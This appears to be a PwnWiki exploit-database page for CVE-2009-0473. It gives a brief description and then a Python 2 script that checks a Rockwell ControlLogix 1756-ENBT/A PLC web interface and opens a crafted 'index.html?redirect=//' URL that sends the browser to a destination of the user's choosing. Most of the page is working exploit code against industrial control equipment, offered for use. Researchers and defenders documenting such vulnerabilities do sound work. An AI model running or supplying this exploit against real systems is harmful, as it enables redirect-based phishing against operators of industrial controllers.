免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
INFO
## Description Simple script to exploit open redirection vulnerability in Rockwell ControlLogix 1756-ENBT/A. ##Vulnerability Details https://www.cvedetails.com/cve/CVE-2009-0473/ ###Requirements * Python 2.7 * You must be running an X Windows environment before executing this script. * It will use Python’s “webbrowser” library to open the site using the default browser.
EXP
#Author : Akbar Qureshi
import webbrowser
import urllib2
class colors:
alert = '\03393m'
end = '\0330m'
print colors.alert + """
###########################################################################
# Description: This script will exploit the open redirction vulnerability #
# in Rockwell ControlLogix 1756-ENBT/A #
# CVE Details: https://www.cvedetails.com/cve/CVE-2009-0473/ #
###########################################################################
""" + colors.end
plcurl = raw_input("Enter the plc web interface url: ")
try:
url = urllib2.urlopen('http://%s' % plcurl, timeout=5)
except:
print "Cannot open url,please try again"
else:
open_redir = raw_input("Enter open redirection URL: " )
url = "http://%s/index.html?redirect=//%s" % (plcurl,open_redir)
webbrowser.open(url,new=1)
免费、自由、人人可编辑的漏洞库--pwnwiki.com
